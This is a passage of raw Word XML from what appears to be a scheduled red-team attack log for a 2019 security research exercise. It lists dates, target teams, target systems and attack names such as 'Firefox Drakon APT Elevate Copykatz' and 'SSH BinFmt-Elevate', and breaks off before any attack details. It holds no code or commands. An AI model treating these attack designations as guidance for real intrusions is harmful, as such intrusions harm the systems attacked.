                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Screencap APK (Failed), Firefox BITS MicroAPT, Barephone Micro APT, Firefox Drakon APT BinFmt Elevate inject, Appstarter APK micro APT Elevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="7B2638BC" w14:textId="77777777" w:rsidTr="006C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67" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AE43617" w14:textId="091A76E5" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/16/201</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FFBE2ED" w14:textId="5928A580" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>CADETS1 and 2, FiveD1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D3D7E62" w14:textId="7D5EA312" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Nginx Drakon APT, Firefox BITS Verifier Drakon APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="69192209" w14:textId="77777777" w:rsidTr="006C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67" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="045B7AEA" w14:textId="347B7041" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/1</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/201</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="448704CD" w14:textId="3494CCFC" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">TRACE1 and 2, CADETS1 and 2, ClearScope1 and 2,  </w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>MARPLE</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>1, FiveD3 and 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0AD0033E" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Windows 7 &amp; Ubuntu 14.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10E85A55" w14:textId="431D1524" w:rsidR="00FC027E" w:rsidRDefault="00526748" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc12599994"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>05/08/2019</w:t>
      </w:r>
      <w:r w:rsidR="00DC723B">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>: TA5.2 Attacks Day 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5A342D5B" w14:textId="270E7E6C" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00DC723B" w:rsidP="00DC723B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc12599995"/>
      <w:r>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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475"/>
        <w:gridCol w:w="5865"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC027E" w:rsidRPr="00FC027E" w14:paraId="7F3D3C2F" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CDE32EA" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>12:58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33541227" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>TA5.2 Windows 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B491F29" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Firefox Drakon APT Sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC027E" w:rsidRPr="00FC027E" w14:paraId="71CE3BBF" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B3AE489" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>14:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4D5E5993" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>TA5.2 Windows 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="379F3558" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Firefox Drakon APT Elevate Copykatz 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC027E" w:rsidRPr="00FC027E" w14:paraId="6D35FB6A" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FD6F2DE" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>14:54</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="442FF874" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>TA5.2 Ubuntu 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7F5B50C1" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>SSH BinFmt-Elevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC027E" w:rsidRPr="00FC027E" w14:paraId="6E94857D" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4AFB02B9" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>15:14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1AA45EBB" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>TA5.2 Windows 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2ED2F883" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Firefox Drakon APT Elevate Copykatz 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC027E" w:rsidRPr="00FC027E" w14:paraId="52D572DE" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="52D20CB0" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>15:41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F3D9493" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>TA5.2 Windows 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5879C708" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Firefox BITS Micro APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03313143" w14:textId="21BAF033" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00DC723B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_wwtb8c5oysml" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="8" w:name="_Toc12599996"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:58 -- TA5.2 Windows 2 -- Firefox Drakon APT Sysinfo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="113B93BC" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00DC723B" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC723B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
